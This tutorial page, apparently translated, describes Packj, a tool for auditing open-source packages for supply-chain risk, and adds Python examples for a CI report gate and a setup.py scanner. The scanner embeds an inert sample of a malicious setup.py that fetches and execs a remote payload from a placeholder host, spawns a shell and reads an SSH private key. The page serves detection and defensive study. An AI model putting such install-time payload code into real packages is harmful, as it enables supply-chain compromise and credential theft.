About Packj
Packj is a code security scanning tool for software packages. It is a command-line tool suite that helps researchers and developers detect potentially malicious or risky code in packages, with the goal of mitigating software supply-chain attacks. It understands packages from popular open-source registries such as NPM, RubyGems and PyPI, and can be used to audit packages continuously and obtain free risk-assessment reports.

Installation
Packj is written in Python 3, so a working Python 3 environment is needed first. Then clone the project source with:
git clone https://github.com/ossillate-inc/packj.git
Packj provides two tools:
Audit: checks a package for malicious or risky attributes;
Sandbox: installs a package inside a sandbox to contain what the installation can do;
$ python3 main.py --help
usage: main [options] args
options:
audit Audit a package for malware/risky attributes
sandbox Sandbox package installation to mitigate risks
Usage
Auditing a package
Packj audits open-source packages for "risky" attributes, that is, properties that make them susceptible to supply-chain attacks: an author email on an expired domain (with no 2FA protecting the account, so whoever re-registers the domain can reset the password), too long a gap since the last release, use of sensitive APIs, permission issues, and so on.
The tool can audit:
multiple packages at once:
python3 main.py audit -p pypi:requests rubygems:overcommit
dependency files:
python3 main.py audit -f npm:package.json pypi:requirements.txt
The audit can also be run in a Docker/Podman container:
$ docker run -v /tmp:/tmp/packj -it ossillate/packj:latest audit --trace -p npm:browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [mail@substack.net]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17.0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
[+] Installing package and tracing code...OK [found ['process', 'files', 'network'] syscalls]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/packj_54rbjhgm/report_npm-browserify-17.0.0_hlr1rhcz.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}
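The audit ends with a JSON report whose "undesirable" list is the machine-readable verdict. What follows is an added example, not code from Packj or from the original article: a small Python gate that a CI step could run over such a report. It parses each risk string, extracts the source locations that some entries carry after a colon (the "label: ['path:line', ...]" form), and exits non-zero when a risk matches a blocking policy. The policy list, the sample report and the "demo-1.0/setup.py" locations are constructed for the example; only the "undesirable" key and the wording of the risk labels are taken from the output shown above.

```python
import ast
import json
import sys

# Constructed sample in the shape of the "undesirable" list printed above.
# The locations on the "fetches data" entry are made up for the example.
SAMPLE_REPORT = json.dumps({
    "undesirable": [
        "old package: 598 days old",
        "invalid or no author email: expired author email domain",
        "generates new code at runtime",
        "fetches data over the network: ['demo-1.0/setup.py:40', 'demo-1.0/setup.py:50']",
        "reads files and dirs",
    ]
})

# Assumed policy, not Packj's: risk labels that fail the build outright.
# Every other entry in the report is surfaced as a warning.
BLOCKING_RISKS = (
    "generates new code at runtime",
    "fetches data over the network",
    "forks or exits OS processes",
    "invalid or no author email",
)


def parse_risk(risk):
    """Split "label: ['path:line', ...]" into (label, [locations]).

    Entries without a location list come back with an empty list; a malformed
    list is treated as absent rather than crashing the gate.
    """
    label, sep, rest = risk.partition(": [")
    if not sep:
        return risk.strip(), []
    try:
        locations = list(ast.literal_eval("[" + rest))
    except (ValueError, SyntaxError):
        locations = []
    return label.strip(), locations


def evaluate_report(report_text, blocking=BLOCKING_RISKS):
    """Bucket every risk in a Packj JSON report into blocking or warnings."""
    report = json.loads(report_text)
    verdict = {"blocking": [], "warnings": []}
    for risk in report.get("undesirable", []):
        label, locations = parse_risk(risk)
        bucket = "blocking" if label.startswith(blocking) else "warnings"
        verdict[bucket].append({"risk": label, "locations": locations})
    return verdict


def gate(report_text, blocking=BLOCKING_RISKS):
    """Return the exit code a CI step should use: 0 passes, 1 blocks."""
    verdict = evaluate_report(report_text, blocking)
    for entry in verdict["blocking"]:
        where = ", ".join(entry["locations"]) or "package metadata"
        print(f"BLOCK  {entry['risk']} [{where}]")
    for entry in verdict["warnings"]:
        print(f"WARN   {entry['risk']}")
    return 1 if verdict["blocking"] else 0


if __name__ == "__main__":
    # Usage: python3 packj_gate.py <report.json>; with no argument the
    # embedded sample is evaluated.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    sys.exit(gate(text))
```

Which risks count as blocking is a local decision; the list here treats runtime code generation, network access, process spawning and an unverifiable author email as hard failures and leaves staleness and plain file reads as warnings, since those describe most legitimate build tooling too.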
Sandboxed package installation
Packj provides a lightweight sandbox in which packages can be installed and tested safely. In particular, it prevents a malicious package from exfiltrating sensitive data, accessing sensitive files (such as SSH keys) or planting persistent malware. After the install it summarises the network connections and filesystem changes the package attempted and asks whether to commit or discard them:
$ python3 main.py sandbox gem install overcommit
Fetching: overcommit-0.59.1.gem (100%)
Install hooks by running `overcommit --install` in your Git repository
Successfully installed overcommit-0.59.1
Parsing documentation for overcommit-0.59.1
Installing ri documentation for overcommit-0.59.1
#############################
# Review summarized activity
#############################
[+] Network connections
[+] DNS (1 IPv4 addresses) at port 53 [rule: ALLOW]
[+] rubygems.org (4 IPv6 addresses) at port 443 [rule: IPv6 rules not supported]
[+] rubygems.org (4 IPv4 addresses) at port 443 [rule: ALLOW]
[+] Filesystem changes
/
└── home
└── ubuntu
└── .ruby
├── gems
│ ├── iniparse-1.5.0 [new: DIR, 15 files, 46.6K bytes]
│ ├── rexml-3.2.5 [new: DIR, 77 files, 455.6K bytes]
│ ├── overcommit-0.59.1 [new: DIR, 252 files, 432.7K bytes]
│ └── childprocess-4.1.0 [new: DIR, 57 files, 141.2K bytes]
├── cache
│ ├── iniparse-1.5.0.gem [new: FILE, 16.4K bytes]
│ ├── rexml-3.2.5.gem [new: FILE, 93.2K bytes]
│ ├── childprocess-4.1.0.gem [new: FILE, 34.3K bytes]
│ └── overcommit-0.59.1.gem [new: FILE, 84K bytes]
├── specifications
│ ├── rexml-3.2.5.gemspec [new: FILE, 2.7K bytes]
│ ├── overcommit-0.59.1.gemspec [new: FILE, 1.7K bytes]
│ ├── childprocess-4.1.0.gemspec [new: FILE, 1.8K bytes]
│ └── iniparse-1.5.0.gemspec [new: FILE, 1.3K bytes]
├── bin
│ └── overcommit [new: FILE, 622 bytes]
└── doc
├── iniparse-1.5.0
│ └── ri [new: DIR, 119 files, 131.7K bytes]
├── rexml-3.2.5
│ └── ri [new: DIR, 836 files, 841K bytes]
├── overcommit-0.59.1
│ └── ri [new: DIR, 1046 files, 1.5M bytes]
└── childprocess-4.1.0
└── ri [new: DIR, 272 files, 297.8K bytes]
[C]ommit all changes, [Q|q]uit & discard changes, [L|l]ist details:
Malware detection
While testing the tool we found 40 malicious packages on PyPI, some of which have since been taken down:
$ python3 main.py audit pypi:krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [KrisWuQian@baidu.com]
[+] Checking email/domain validity...OK [KrisWuQian@baidu.com]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undesirable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7
Packj flagged KrisQian (v0.0.7) as suspicious because it has no source repository and uses sensitive APIs (network communication, code generation) during package installation, that is, in setup.py. Further investigation confirmed that the package is indeed malicious.
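The KrisQian verdict rests on the "Analyzing code" step, which reports the permissions a package needs (network, codegen, process, file) and the setup.py lines that use them. The following Python is an added example, not Packj's analyzer and not the KrisQian package's code (the page does not show it), illustrating how such a check can be built on Python's ast module: it resolves import aliases, maps each call to a permission category, and records whether the call sits at module level of setup.py, where it runs at pip install time, or only inside a function. The setup.py being scanned is constructed for the example, and the API-to-permission table is an assumption to be extended for your own environment.

```python
import ast

# Constructed setup.py used as input; NOT the KrisQian package, only the
# typical shape of a malicious one: fetch a payload, exec it, spawn a shell
# and read an SSH key, all at install time. Nothing here is executed.
SAMPLE_SETUP_PY = '''\
import base64, os, subprocess
from urllib.request import urlopen
from setuptools import setup

payload = urlopen("http://example.invalid/stage2").read()
exec(base64.b64decode(payload))
subprocess.Popen(["sh", "-c", "id"])
keys = open(os.path.expanduser("~/.ssh/id_rsa")).read()

def harmless():
    return open("README.md").read()

setup(name="demo", version="0.0.1")
'''

# Assumed mapping from fully-qualified call names to the permission implied.
SENSITIVE_CALLS = {
    "network": {"urllib.request.urlopen", "requests.get", "requests.post",
                "socket.socket", "socket.create_connection",
                "http.client.HTTPConnection", "http.client.HTTPSConnection"},
    "codegen": {"exec", "eval", "compile", "__import__",
                "importlib.import_module"},
    "process": {"subprocess.Popen", "subprocess.run", "subprocess.call",
                "subprocess.check_output", "os.system", "os.popen", "os.fork",
                "os.execv", "os.execvp"},
    "file": {"open", "os.listdir", "os.walk", "shutil.copy",
             "shutil.copytree", "shutil.rmtree", "os.remove"},
}


def _import_aliases(tree):
    """Map each local name to the module or attribute it was imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                # "import os.path" binds "os"; "import subprocess as sp" binds "sp"
                local = a.asname or a.name.split(".")[0]
                aliases[local] = a.name if a.asname else local
        elif isinstance(node, ast.ImportFrom) and node.module and not node.level:
            for a in node.names:
                aliases[a.asname or a.name] = node.module + "." + a.name
    return aliases


def _dotted_name(func):
    """Return 'a.b.c' for Name/Attribute chains, None for anything else."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if not isinstance(func, ast.Name):
        return None
    parts.append(func.id)
    return ".".join(reversed(parts))


def scan_setup_py(source):
    """Return sensitive calls as dicts with perm, api, line and install_time."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)

    # Code nested in a def/lambda only runs if something calls it; code at
    # module level of setup.py runs as soon as pip builds the package.
    inside_def = set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            inside_def.update(id(n) for n in ast.walk(node))

    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        head, _, tail = name.partition(".")
        full = aliases.get(head, head) + ("." + tail if tail else "")
        for perm, apis in SENSITIVE_CALLS.items():
            if full in apis:
                findings.append({"perm": perm, "api": full, "line": node.lineno,
                                 "install_time": id(node) not in inside_def})
    findings.sort(key=lambda f: f["line"])
    return findings


def required_perms(findings, install_time_only=False):
    """Sorted set of permissions, optionally limited to install-time calls."""
    return sorted({f["perm"] for f in findings
                   if f["install_time"] or not install_time_only})


if __name__ == "__main__":
    found = scan_setup_py(SAMPLE_SETUP_PY)
    for f in found:
        when = "install-time" if f["install_time"] else "deferred"
        print(f'setup.py:{f["line"]} {f["perm"]:8} {f["api"]} ({when})')
    print("needs perms:", ",".join(required_perms(found)))
```

Resolving aliases matters in practice: "import subprocess as sp" followed by "sp.run(...)" is an easy way to slip past a scanner that only matches literal names. The install_time flag separates what runs on "pip install" from code that merely ships in the package, which is the distinction that made the KrisQian setup.py findings serious.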
License
The project is developed and released under the AGPL-3.0 open-source license.
Project
Packj: https://github.com/ossillate-inc/packj
References
https://packj.dev/
https://www.youtube.com/watch?v=Rcuqn56uCDk
https://speakerdeck.com/ashishbijlani/pyconus22-slides
https://www.blackhat.com/asia-22/arsenal/schedule/#mitigating-open-source-software-supply-chain-attacks-26241
https://www.blackhat.com/us-22/arsenal/schedule/#detecting-typo-squatting-backdoored-abandoned-and-other-risky-open-source-packages-using-packj-28075
https://osseu2022.sched.com/overview/type/SupplyChainSecurityCon
https://nullcon.net/goa-2022/unearthing-malicious-and-other-risky-open-source-packages-using-packj
https://www.youtube.com/watch?v=PHfN-NrUCoo
https://speakerdeck.com/ashishbijlani/mitigating-open-source-software-supply-chain-attacks
Page title: How to use Packj to detect malicious or risky open-source packages
URL: http://www.dlmjj.cn/article/dpschco.html